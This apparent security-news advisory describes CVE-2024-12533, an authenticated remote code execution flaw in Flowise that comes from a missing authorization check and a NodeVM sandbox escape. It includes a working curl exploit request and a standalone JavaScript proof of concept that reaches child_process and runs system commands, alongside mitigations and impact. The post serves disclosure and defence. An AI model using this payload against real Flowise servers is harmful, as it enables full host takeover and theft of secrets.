Flowise, Authenticated RCE via NodeVM Sandbox Escape, CVE-2024-12533 (Critical)

Listen to this Post

The vulnerability stems from a missing route-level authorization check on the endpoint /api/v1/node-custom-function, which allows any authenticated user or API key holder to submit arbitrary JavaScript for execution. When the environment variable `E2B_APIKEY` is not configured (the default in most self-hosted deployments), Flowise falls back to executing the submitted code inside a `NodeVM` sandbox. The sandbox configuration includes eval: false, wasm: false, and mocked HTTP clients, but an attacker can escape it by abusing an exception path. Specifically, an `Error` object originating from the host runtime leaks a reference to the outer `Function` constructor via e.constructor.constructor, which can then be used to access `process.getBuiltinModule(“child_process”)` and execute arbitrary system commands. The combination of missing authorization and a flawed sandbox results in authenticated Remote Code Execution (RCE) on the Flowise server host. The CVSS v3.1 score is 9.9 (Critical).

dailycve form

Platform: `Flowise`
Version: `2.1.4 or earlier`
Vulnerability: `Authenticated RCE`
Severity: `Critical`
date: `2026-05-14`

Prediction: `Q3 2026`

Analytics

What UnderCode Say:

Check if E2B_APIKEY is set (if not, vulnerable)
[ -z "$E2B_APIKEY" ] && echo "VULNERABLE: NodeVM fallback active"
Simulate exploitation attempt (requires valid API key)
curl -X POST http://target:3000/api/v1/node-custom-function \
-H "Authorization: Bearer <api-key>" \
-H "Content-Type: application/json" \
-d '{"javascriptFunction":"async function f(){const e=new Error();e.name=Object.create(null);return e.stack;} return await f().catch(e=>{const F=e.constructor.constructor;const cp=F(\"return process.getBuiltinModule('child_process')\")();return cp.execSync(\"id\").toString().trim();});"}'

Exploit

// Standalone verification with E2B_APIKEY unset
const { nodeClass: CustomFunction } = require('Flowise/packages/components/nodes/utilities/CustomFunction/CustomFunction.ts');
const attackCode = <code>async function f() { const error = new Error(); error.name = Object.create(null); return error.stack; }
return await f().catch(e => {
const FunctionCtor = e.constructor.constructor;
const cp = FunctionCtor('return process.getBuiltinModule("child_process")')();
return cp.execSync('id').toString().trim();
});
`;
const node = new CustomFunction();
const result = await node.init({ inputs: { javascriptFunction: attackCode } });
console.log('[RCE OUTPUT]', result);

Protection from this CVE

– Add explicit permission gating to `POST /api/v1/node-custom-function using the existing `checkPermission` middleware pattern.
– Fail closed if `E2B_APIKEY` is absent – do not silently downgrade to `NodeVM` for untrusted code execution.
– Restrict this endpoint from generic API key access; use dedicated permissions.
– Consider removing `@flowiseai/nodevm` and using `isolated-vm` as a safer alternative.

Impact

Any authenticated Flowise user or API key holder can execute arbitrary commands as the Flowise server process, leading to full compromise of the host, including:
– Reading environment variables and secrets.
– Arbitrary filesystem access.
– Outbound network requests from the host.
– Foothold for persistence or lateral movement.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top